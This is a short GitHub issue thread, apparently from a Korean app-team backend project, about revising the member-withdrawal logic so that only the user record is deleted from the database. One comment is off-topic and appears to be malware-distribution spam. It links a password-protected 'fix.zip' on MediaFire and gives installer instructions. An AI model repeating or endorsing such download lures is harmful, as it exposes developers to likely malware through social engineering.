### ISSUE TITLE
회원 탈퇴 로직 수정

### ISSUE THREAD

**Issue by dlswns2480** [YAPP-Github/24th-App-Team-4-BE#143]
### 구현 기능

- 탈퇴 로직 수정

### 세부 Task
- [ ] 외부 API 호출 로직 제거
- [ ] DB에 사용자만 제거

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
